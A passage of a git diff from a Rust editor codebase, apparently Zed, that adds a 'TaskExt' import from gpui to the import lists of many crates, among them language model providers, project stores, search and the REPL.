futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/google.rs b/crates/language_models/src/provider/google.rs index 87f2eeb26ab0f8..d5b47bf4583126 100644 --- a/crates/language_models/src/provider/google.rs +++ b/crates/language_models/src/provider/google.rs @@ -4,7 +4,7 @@ use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; pub use google_ai::completion::{GoogleEventMapper, into_google}; use google_ai::{GenerateContentResponse, GoogleModelMode}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ AuthenticateError, ConfigurationViewTargetAgent, EnvVar, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/lmstudio.rs b/crates/language_models/src/provider/lmstudio.rs index 50ac12865240e4..ea19c265e9c5d2 100644 --- a/crates/language_models/src/provider/lmstudio.rs +++ b/crates/language_models/src/provider/lmstudio.rs @@ -4,7 +4,7 @@ use credentials_provider::CredentialsProvider; use fs::Fs; use futures::Stream; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Subscription, Task}; +use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Subscription, Task, TaskExt}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/mistral.rs b/crates/language_models/src/provider/mistral.rs index 403d94e9832178..65eea3b696b498 100644 --- a/crates/language_models/src/provider/mistral.rs +++ b/crates/language_models/src/provider/mistral.rs @@ -3,7 +3,7 @@ use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, Global, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, Global, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/ollama.rs b/crates/language_models/src/provider/ollama.rs index f38321b7c88187..d117bce3784b6e 100644 --- a/crates/language_models/src/provider/ollama.rs +++ b/crates/language_models/src/provider/ollama.rs @@ -3,7 +3,7 @@ use credentials_provider::CredentialsProvider; use fs::Fs; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; use futures::{Stream, TryFutureExt, stream}; -use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Task}; +use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Task, TaskExt}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index 5557ce2d047887..4957eea9635e3d 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -2,7 +2,7 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/open_ai_compatible.rs b/crates/language_models/src/provider/open_ai_compatible.rs index 5f7f6db3d36a45..a80965eced5ce5 100644 --- a/crates/language_models/src/provider/open_ai_compatible.rs +++ b/crates/language_models/src/provider/open_ai_compatible.rs @@ -2,7 +2,7 @@ use anyhow::Result; use convert_case::{Case, Casing}; use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/open_router.rs b/crates/language_models/src/provider/open_router.rs index bc4fbcc9aa761d..c0b0e330629427 100644 --- a/crates/language_models/src/provider/open_router.rs +++ b/crates/language_models/src/provider/open_router.rs @@ -2,7 +2,7 @@ use anyhow::Result; use collections::HashMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs index 4380d2e1a13c1f..647e8496b0577b 100644 --- a/crates/language_models/src/provider/opencode.rs +++ b/crates/language_models/src/provider/opencode.rs @@ -3,7 +3,7 @@ use collections::BTreeMap; use credentials_provider::CredentialsProvider; use fs::Fs; use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::{AsyncBody, HttpClient, http}; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/vercel_ai_gateway.rs b/crates/language_models/src/provider/vercel_ai_gateway.rs index 789e8e35e8546a..312cdee5a6605b 100644 --- a/crates/language_models/src/provider/vercel_ai_gateway.rs +++ b/crates/language_models/src/provider/vercel_ai_gateway.rs @@ -2,7 +2,7 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{AsyncReadExt, FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, TaskExt, Window}; use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest, http}; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_models/src/provider/x_ai.rs b/crates/language_models/src/provider/x_ai.rs index 12f195417b5220..623853b5214acc 100644 --- a/crates/language_models/src/provider/x_ai.rs +++ b/crates/language_models/src/provider/x_ai.rs @@ -2,7 +2,7 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, Task, Window}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, Task, TaskExt, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, diff --git a/crates/language_selector/src/language_selector.rs b/crates/language_selector/src/language_selector.rs index 70a03514f45371..cd457cb50f943b 100644 --- a/crates/language_selector/src/language_selector.rs +++ b/crates/language_selector/src/language_selector.rs @@ -6,7 +6,7 @@ use editor::Editor; use fuzzy::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ParentElement, - Render, Styled, WeakEntity, Window, actions, + Render, Styled, TaskExt, WeakEntity, Window, actions, }; use language::{Buffer, LanguageMatcher, LanguageName, LanguageRegistry}; use open_path_prompt::file_finder_settings::FileFinderSettings; diff --git a/crates/language_tools/src/lsp_button.rs b/crates/language_tools/src/lsp_button.rs index 8fbe4385a172f3..63529ea0cf300d 100644 --- a/crates/language_tools/src/lsp_button.rs +++ b/crates/language_tools/src/lsp_button.rs @@ -13,7 +13,7 @@ use language::language_settings::{EditPredictionProvider, all_language_settings} use client::proto; use collections::HashSet; use editor::{Editor, EditorEvent}; -use gpui::{Anchor, Entity, Subscription, Task, WeakEntity, actions}; +use gpui::{Anchor, Entity, Subscription, Task, TaskExt, WeakEntity, actions}; use language::{BinaryStatus, BufferId, ServerHealth}; use lsp::{LanguageServerId, LanguageServerName, LanguageServerSelector}; use project::{ diff --git a/crates/onboarding/src/basics_page.rs b/crates/onboarding/src/basics_page.rs index 7d021c54447666..30e69a320ea3d4 100644 --- a/crates/onboarding/src/basics_page.rs +++ b/crates/onboarding/src/basics_page.rs @@ -5,7 +5,7 @@ use client::{Client, TelemetrySettings, UserStore, zed_urls}; use cloud_api_types::Plan; use collections::HashMap; use fs::Fs; -use gpui::{Action, Animation, AnimationExt, App, Entity, IntoElement, pulsating_between}; +use gpui::{Action, Animation, AnimationExt, App, Entity, IntoElement, TaskExt, pulsating_between}; use project::agent_server_store::AllAgentServersSettings; use project::project_settings::ProjectSettings; use project::{AgentRegistryStore, RegistryAgent}; diff --git a/crates/outline_panel/src/outline_panel.rs b/crates/outline_panel/src/outline_panel.rs index 7b378c6fb8283f..9e179c97a7d60b 100644 --- a/crates/outline_panel/src/outline_panel.rs +++ b/crates/outline_panel/src/outline_panel.rs @@ -18,7 +18,7 @@ use gpui::{ DismissEvent, Div, ElementId, Entity, EventEmitter, FocusHandle, Focusable, HighlightStyle, InteractiveElement, IntoElement, KeyContext, ListHorizontalSizingBehavior, ListSizingBehavior, MouseButton, MouseDownEvent, ParentElement, Pixels, Point, Render, ScrollStrategy, - SharedString, Stateful, StatefulInteractiveElement as _, Styled, Subscription, Task, + SharedString, Stateful, StatefulInteractiveElement as _, Styled, Subscription, Task, TaskExt, UniformListScrollHandle, WeakEntity, Window, actions, anchored, deferred, div, point, px, size, uniform_list, }; diff --git a/crates/project/src/agent_registry_store.rs b/crates/project/src/agent_registry_store.rs index b2010da65d9477..21c07b0feba68b 100644 --- a/crates/project/src/agent_registry_store.rs +++ b/crates/project/src/agent_registry_store.rs @@ -6,7 +6,7 @@ use anyhow::{Context as _, Result, bail}; use collections::HashMap; use fs::Fs; use futures::AsyncReadExt; -use gpui::{App, AppContext as _, Context, Entity, Global, SharedString, Task}; +use gpui::{App, AppContext as _, Context, Entity, Global, SharedString, Task, TaskExt}; use http_client::{AsyncBody, HttpClient}; use serde::Deserialize; use settings::Settings as _; diff --git a/crates/project/src/agent_server_store.rs b/crates/project/src/agent_server_store.rs index cdde687ec63233..3d231a3e8ef359 100644 --- a/crates/project/src/agent_server_store.rs +++ b/crates/project/src/agent_server_store.rs @@ -8,7 +8,7 @@ use std::{ use anyhow::{Context as _, Result, bail}; use collections::HashMap; use fs::Fs; -use gpui::{AsyncApp, Context, Entity, EventEmitter, SharedString, Subscription, Task}; +use gpui::{AsyncApp, Context, Entity, EventEmitter, SharedString, Subscription, Task, TaskExt}; use http_client::{HttpClient, github::AssetKind}; use node_runtime::NodeRuntime; use percent_encoding::percent_decode_str; diff --git a/crates/project/src/buffer_store.rs b/crates/project/src/buffer_store.rs index 2e234a7f936e7b..f9076753998e93 100644 --- a/crates/project/src/buffer_store.rs +++ b/crates/project/src/buffer_store.rs @@ -8,7 +8,8 @@ use client::Client; use collections::{HashMap, HashSet, hash_map}; use futures::{Future, FutureExt as _, channel::oneshot, future::Shared}; use gpui::{ - App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, + App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, TaskExt, + WeakEntity, }; use language::{ Buffer, BufferEvent, Capability, DiskState, File as _, Language, LineEnding, Operation, diff --git a/crates/project/src/context_server_store.rs b/crates/project/src/context_server_store.rs index 7b9fc16f100228..1ea6d2c41887d7 100644 --- a/crates/project/src/context_server_store.rs +++ b/crates/project/src/context_server_store.rs @@ -13,7 +13,9 @@ use context_server::{ContextServer, ContextServerCommand, ContextServerId}; use credentials_provider::CredentialsProvider; use futures::future::Either; use futures::{FutureExt as _, StreamExt as _, future::join_all}; -use gpui::{App, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, actions}; +use gpui::{ + App, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, TaskExt, WeakEntity, actions, +}; use http_client::HttpClient; use itertools::Itertools; use rand::Rng as _; diff --git a/crates/project/src/debugger/dap_store.rs b/crates/project/src/debugger/dap_store.rs index 7ac9c02fe4fbf2..e0594467f0937a 100644 --- a/crates/project/src/debugger/dap_store.rs +++ b/crates/project/src/debugger/dap_store.rs @@ -30,7 +30,7 @@ use futures::{ channel::mpsc::{self, UnboundedSender}, future::{Shared, join_all}, }; -use gpui::{App, AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task}; +use gpui::{App, AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task, TaskExt}; use http_client::HttpClient; use language::{Buffer, LanguageToolchainStore}; use node_runtime::NodeRuntime; diff --git a/crates/project/src/debugger/session.rs b/crates/project/src/debugger/session.rs index feba6ff5520681..39578eaf8f0b52 100644 --- a/crates/project/src/debugger/session.rs +++ b/crates/project/src/debugger/session.rs @@ -38,7 +38,7 @@ use futures::{AsyncBufReadExt as _, SinkExt, StreamExt, TryStreamExt}; use futures::{FutureExt, future::Shared}; use gpui::{ App, AppContext, AsyncApp, BackgroundExecutor, Context, Entity, EventEmitter, SharedString, - Task, WeakEntity, + Task, TaskExt, WeakEntity, }; use http_client::HttpClient; use node_runtime::NodeRuntime; diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index d5c6565b6ccd80..8f49e4c91832c0 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -47,7 +47,7 @@ use git::{ }; use gpui::{ App, AppContext, AsyncApp, BackgroundExecutor, Context, Entity, EventEmitter, SharedString, - Subscription, Task, WeakEntity, + Subscription, Task, TaskExt, WeakEntity, }; use language::{ Buffer, BufferEvent, Language, LanguageRegistry, diff --git a/crates/project/src/lsp_command.rs b/crates/project/src/lsp_command.rs index e22f478eb9b95e..e110176dd208f7 100644 --- a/crates/project/src/lsp_command.rs +++ b/crates/project/src/lsp_command.rs @@ -14,7 +14,7 @@ use client::proto::{self, PeerId}; use clock::Global; use collections::HashMap; use futures::future; -use gpui::{App, AsyncApp, Entity, SharedString, Task, prelude::FluentBuilder}; +use gpui::{App, AsyncApp, Entity, SharedString, Task, TaskExt, prelude::FluentBuilder}; use language::{ Anchor, Bias, Buffer, BufferSnapshot, CachedLspAdapter, CharKind, CharScopeContext, OffsetRangeExt, PointUtf16, ToOffset, ToPointUtf16, Transaction, Unclipped, diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index ad3344fa25a7d7..85229cfdcdeb34 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -65,7 +65,7 @@ use futures::{ use globset::{Glob, GlobBuilder, GlobMatcher, GlobSet, GlobSetBuilder}; use gpui::{ App, AppContext, AsyncApp, Context, Entity, EventEmitter, PromptLevel, SharedString, - Subscription, Task, WeakEntity, + Subscription, Task, TaskExt, WeakEntity, }; use http_client::HttpClient; use itertools::Itertools as _; diff --git a/crates/project/src/lsp_store/log_store.rs b/crates/project/src/lsp_store/log_store.rs index ae6f9ec09d4192..0cfe3c14cf2cba 100644 --- a/crates/project/src/lsp_store/log_store.rs +++ b/crates/project/src/lsp_store/log_store.rs @@ -2,7 +2,9 @@ use std::{collections::VecDeque, sync::Arc}; use collections::HashMap; use futures::{StreamExt, channel::mpsc}; -use gpui::{App, AppContext as _, Context, Entity, EventEmitter, Global, Subscription, WeakEntity}; +use gpui::{ + App, AppContext as _, Context, Entity, EventEmitter, Global, Subscription, TaskExt, WeakEntity, +}; use lsp::{ IoKind, LanguageServer, LanguageServerId, LanguageServerName, LanguageServerSelector, MessageType, TraceValue, diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index 4e74c4cf1fcf40..ac34cbdd0610c2 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -86,7 +86,7 @@ use image_store::{ImageItemEvent, ImageStoreEvent}; use ::git::{blame::Blame, status::FileStatus}; use gpui::{ App, AppContext, AsyncApp, BorrowAppContext, Context, Entity, EventEmitter, Hsla, SharedString, - Task, WeakEntity, Window, + Task, TaskExt, WeakEntity, Window, }; use language::{ Buffer, BufferEvent, Capability, CodeLabel, CursorShape, DiskState, Language, LanguageName, diff --git a/crates/project/src/worktree_store.rs b/crates/project/src/worktree_store.rs index c6abb6e1743540..f544973a548b92 100644 --- a/crates/project/src/worktree_store.rs +++ b/crates/project/src/worktree_store.rs @@ -12,7 +12,7 @@ use collections::HashMap; use fs::{Fs, copy_recursive}; use futures::{FutureExt, future::Shared}; use gpui::{ - App, AppContext as _, AsyncApp, Context, Entity, EntityId, EventEmitter, Global, Task, + App, AppContext as _, AsyncApp, Context, Entity, EntityId, EventEmitter, Global, Task, TaskExt, WeakEntity, }; use itertools::Either; diff --git a/crates/project_benchmarks/src/main.rs b/crates/project_benchmarks/src/main.rs index 054b5eb95a5627..01dc141904e925 100644 --- a/crates/project_benchmarks/src/main.rs +++ b/crates/project_benchmarks/src/main.rs @@ -6,6 +6,7 @@ use clap::Parser; use client::{Client, UserStore}; use futures::channel::oneshot; use gpui::AppContext as _; +use gpui::TaskExt; use http_client::FakeHttpClient; use language::LanguageRegistry; use node_runtime::NodeRuntime; diff --git a/crates/project_symbols/src/project_symbols.rs b/crates/project_symbols/src/project_symbols.rs index 8edcd9a80d1759..2202ff35e18b2f 100644 --- a/crates/project_symbols/src/project_symbols.rs +++ b/crates/project_symbols/src/project_symbols.rs @@ -1,8 +1,8 @@ use editor::{Bias, Editor, SelectionEffects, scroll::Autoscroll, styled_runs_for_code_label}; use fuzzy::{StringMatch, StringMatchCandidate}; use gpui::{ - App, Context, DismissEvent, Entity, HighlightStyle, ParentElement, StyledText, Task, TextStyle, - WeakEntity, Window, relative, rems, + App, Context, DismissEvent, Entity, HighlightStyle, ParentElement, StyledText, Task, TaskExt, + TextStyle, WeakEntity, Window, relative, rems, }; use ordered_float::OrderedFloat; use picker::{Picker, PickerDelegate}; diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index 4b99ed37a38642..a5fb5f60450830 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -25,7 +25,7 @@ use disconnected_overlay::DisconnectedOverlay; use fuzzy_nucleo::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - Subscription, Task, WeakEntity, Window, actions, px, + Subscription, Task, TaskExt, WeakEntity, Window, actions, px, }; use picker::{ diff --git a/crates/recent_projects/src/remote_servers.rs b/crates/recent_projects/src/remote_servers.rs index f475baddd99376..3c1ad319461cc0 100644 --- a/crates/recent_projects/src/remote_servers.rs +++ b/crates/recent_projects/src/remote_servers.rs @@ -15,7 +15,7 @@ use extension_host::ExtensionStore; use futures::{FutureExt, StreamExt as _, channel::oneshot, future::Shared}; use gpui::{ Action, AnyElement, App, ClickEvent, ClipboardItem, Context, DismissEvent, Entity, - EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task, + EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task, TaskExt, WeakEntity, Window, canvas, }; use log::{debug, info}; diff --git a/crates/recent_projects/src/sidebar_recent_projects.rs b/crates/recent_projects/src/sidebar_recent_projects.rs index 495907d3934b4a..0b4d3722a344e5 100644 --- a/crates/recent_projects/src/sidebar_recent_projects.rs +++ b/crates/recent_projects/src/sidebar_recent_projects.rs @@ -3,7 +3,7 @@ use std::sync::Arc; use fuzzy_nucleo::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - Subscription, Task, WeakEntity, Window, + Subscription, Task, TaskExt, WeakEntity, Window, }; use picker::{ Picker, PickerDelegate, diff --git a/crates/remote/src/remote_client.rs b/crates/remote/src/remote_client.rs index 138238c5fd45cd..85e07aee0b430a 100644 --- a/crates/remote/src/remote_client.rs +++ b/crates/remote/src/remote_client.rs @@ -26,7 +26,7 @@ use futures::{ }; use gpui::{ App, AppContext as _, AsyncApp, BackgroundExecutor, BorrowAppContext, Context, Entity, - EventEmitter, FutureExt, Global, Task, WeakEntity, + EventEmitter, FutureExt, Global, Task, TaskExt, WeakEntity, }; use parking_lot::Mutex; diff --git a/crates/remote_server/src/headless_project.rs b/crates/remote_server/src/headless_project.rs index 7b0fc0356a130d..098993debad82e 100644 --- a/crates/remote_server/src/headless_project.rs +++ b/crates/remote_server/src/headless_project.rs @@ -8,7 +8,7 @@ use lsp::LanguageServerId; use extension::ExtensionHostProxy; use extension_host::headless_host::HeadlessExtensionStore; use fs::Fs; -use gpui::{App, AppContext as _, AsyncApp, Context, Entity, PromptLevel}; +use gpui::{App, AppContext as _, AsyncApp, Context, Entity, PromptLevel, TaskExt}; use http_client::HttpClient; use language::{Buffer, BufferEvent, LanguageRegistry, proto::serialize_operation}; use node_runtime::NodeRuntime; diff --git a/crates/repl/src/notebook/notebook_ui.rs b/crates/repl/src/notebook/notebook_ui.rs index 78b7f1a4e514b7..d1c44667f940fe 100644 --- a/crates/repl/src/notebook/notebook_ui.rs +++ b/crates/repl/src/notebook/notebook_ui.rs @@ -11,7 +11,7 @@ use futures::FutureExt; use futures::future::Shared; use gpui::{ AnyElement, App, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, ListScrollEvent, - ListState, Point, Task, actions, list, prelude::*, + ListState, Point, Task, TaskExt, actions, list, prelude::*, }; use jupyter_protocol::JupyterKernelspec; use language::{Language, LanguageRegistry}; diff --git a/crates/repl/src/repl_sessions_ui.rs b/crates/repl/src/repl_sessions_ui.rs index 9781382fc85d5d..5fd1e922a50ee0 100644 --- a/crates/repl/src/repl_sessions_ui.rs +++ b/crates/repl/src/repl_sessions_ui.rs @@ -1,6 +1,6 @@ use editor::Editor; use gpui::{ - AnyElement, App, Entity, EventEmitter, FocusHandle, Focusable, Subscription, actions, + AnyElement, App, Entity, EventEmitter, FocusHandle, Focusable, Subscription, TaskExt, actions, prelude::*, }; use project::ProjectItem as _; diff --git a/crates/repl/src/repl_store.rs b/crates/repl/src/repl_store.rs index 4c5827b7c0cf88..b2bf90e99dcd72 100644 --- a/crates/repl/src/repl_store.rs +++ b/crates/repl/src/repl_store.rs @@ -4,7 +4,9 @@ use std::sync::Arc; use anyhow::{Context as _, Result}; use collections::{HashMap, HashSet}; use command_palette_hooks::CommandPaletteFilter; -use gpui::{App, Context, Entity, EntityId, Global, SharedString, Subscription, Task, prelude::*}; +use gpui::{ + App, Context, Entity, EntityId, Global, SharedString, Subscription, Task, TaskExt, prelude::*, +}; use jupyter_websocket_client::RemoteServer; use language::{Language, LanguageName}; use project::{Fs, Project, ProjectPath, WorktreeId}; diff --git a/crates/rules_library/src/rules_library.rs b/crates/rules_library/src/rules_library.rs index e5105081ca7af7..9f87d403e72fce 100644 --- a/crates/rules_library/src/rules_library.rs +++ b/crates/rules_library/src/rules_library.rs @@ -4,7 +4,7 @@ use editor::SelectionEffects; use editor::{CurrentLineHighlight, Editor, EditorElement, EditorEvent, EditorStyle, actions::Tab}; use gpui::{ App, Bounds, DEFAULT_ADDITIONAL_WINDOW_SIZE, Entity, EventEmitter, Focusable, PromptLevel, - Subscription, Task, TextStyle, Tiling, TitlebarOptions, WindowBounds, WindowHandle, + Subscription, Task, TaskExt, TextStyle, Tiling, TitlebarOptions, WindowBounds, WindowHandle, WindowOptions, actions, point, size, transparent_black, }; use language::{Buffer, LanguageRegistry, language_settings::SoftWrap}; diff --git a/crates/search/src/buffer_search.rs b/crates/search/src/buffer_search.rs index 41dda49efa3224..30805264522cf1 100644 --- a/crates/search/src/buffer_search.rs +++ b/crates/search/src/buffer_search.rs @@ -22,7 +22,7 @@ use futures::channel::oneshot; use gpui::{ Action as _, App, ClickEvent, Context, Entity, EventEmitter, Focusable, InteractiveElement as _, IntoElement, KeyContext, ParentElement as _, Render, ScrollHandle, - Styled, Subscription, Task, WeakEntity, Window, div, + Styled, Subscription, Task, TaskExt, WeakEntity, Window, div, }; use language::{Language, LanguageRegistry}; use project::{ diff --git a/crates/search/src/project_search.rs b/crates/search/src/project_search.rs index 00966436595136..1ca53632dba59a 100644 --- a/crates/search/src/project_search.rs +++ b/crates/search/src/project_search.rs @@ -22,7 +22,8 @@ use futures::{StreamExt, stream::FuturesOrdered}; use gpui::{ Action, AnyElement, App, Axis, Context, Entity, EntityId, EventEmitter, FocusHandle, Focusable, Global, Hsla, InteractiveElement, IntoElement, KeyContext, ParentElement, Point, Render, - SharedString, Styled, Subscription, Task, UpdateGlobal, WeakEntity, Window, actions, div, + SharedString, Styled, Subscription, Task, TaskExt, UpdateGlobal, WeakEntity, Window, actions, + div, }; use itertools::Itertools; use language::{Buffer, Language}; diff --git a/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs b/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs index fd6ea35c1e366c..d101effe5bfca7 100644 --- a/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs +++ b/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs @@ -5,7 +5,7 @@ use edit_prediction::{ open_ai_compatible::{open_ai_compatible_api_token, open_ai_compatible_api_url}, }; use edit_prediction_ui::{get_available_providers, set_completion_provider}; -use gpui::{App, Entity, ScrollHandle, prelude::*}; +use gpui::{App, Entity, ScrollHandle, TaskExt, prelude::*}; use language::language_settings::AllLanguageSettings; use settings::Settings as _; diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index 57b7c9b2cbb238..0000aac3f36026 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -23,8 +23,8 @@ use feature_flags::{ }; use gpui::{ Action as _, AnyElement, App, ClickEvent, Context, DismissEvent, Entity, EntityId, FocusHandle, - Focusable, KeyContext, ListState, Modifiers, Pixels, Render, SharedString, Task, WeakEntity, - Window, WindowHandle, linear_color_stop, linear_gradient, list, prelude::*, px, + Focusable, KeyContext, ListState, Modifiers, Pixels, Render, SharedString, Task, TaskExt, + WeakEntity, Window, WindowHandle, linear_color_stop, linear_gradient, list, prelude::*, px, }; use menu::{ Cancel, Confirm, SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious, diff --git a/crates/snippets_ui/src/snippets_ui.rs b/crates/snippets_ui/src/snippets_ui.rs index c881d5276e6f96..ffb136f625286f 100644 --- a/crates/snippets_ui/src/snippets_ui.rs +++ b/crates/snippets_ui/src/snippets_ui.rs @@ -2,7 +2,7 @@ use file_icons::FileIcons; use fuzzy::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ App, Context, DismissEvent, Entity, EventEmitter, Focusable, ParentElement, Render, Styled, - WeakEntity, Window, actions, + TaskExt, WeakEntity, Window, actions, }; use language::{LanguageMatcher, LanguageName, LanguageRegistry}; use open_path_prompt::file_finder_settings::FileFinderSettings; diff --git a/crates/tab_switcher/src/tab_switcher.rs b/crates/tab_switcher/src/tab_switcher.rs index ac4087bb96b2ff..67adf2583d8103 100644 --- a/crates/tab_switcher/src/tab_switcher.rs +++ b/crates/tab_switcher/src/tab_switcher.rs @@ -9,7 +9,7 @@ use fuzzy_nucleo::StringMatchCandidate; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, Modifiers, ModifiersChangedEvent, MouseButton, MouseUpEvent, ParentElement, Point, - Render, Styled, Task, WeakEntity, Window, actions, rems, + Render, Styled, Task, TaskExt, WeakEntity, Window, actions, rems, }; use picker::{Picker, PickerDelegate}; use project::Project; diff --git a/crates/task/src/static_source.rs b/crates/task/src/static_source.rs index 9e4051ef9721f4..a98d38a8eb81ea 100644 --- a/crates/task/src/static_source.rs +++ b/crates/task/src/static_source.rs @@ -3,7 +3,7 @@ use std::sync::Arc; use futures::{StreamExt, channel::mpsc::UnboundedSender}; -use gpui::{App, AppContext}; +use gpui::{App, AppContext, TaskExt}; use parking_lot::RwLock; use serde::Deserialize; use util::ResultExt; diff --git a/crates/tasks_ui/src/tasks_ui.rs b/crates/tasks_ui/src/tasks_ui.rs index ca8ebb5248e4e6..072ad29c1b765e 100644 --- a/crates/tasks_ui/src/tasks_ui.rs +++ b/crates/tasks_ui/src/tasks_ui.rs @@ -2,7 +2,7 @@ use std::{path::Path, sync::Arc}; use collections::HashMap; use editor::Editor; -use gpui::{App, AppContext as _, Context, Entity, Task, Window}; +use gpui::{App, AppContext as _, Context, Entity, Task, TaskExt, Window}; use project::{Location, TaskContexts, TaskSourceKind, Worktree}; use task::{RevealTarget, TaskContext, TaskId, TaskTemplate, TaskVariables, VariableName}; use workspace::Workspace; diff --git a/crates/terminal_view/src/terminal_panel.rs b/crates/terminal_view/src/terminal_panel.rs index 642243ae147539..4ad40b06e67616 100644 --- a/crates/terminal_view/src/terminal_panel.rs +++ b/crates/terminal_view/src/terminal_panel.rs @@ -12,8 +12,8 @@ use 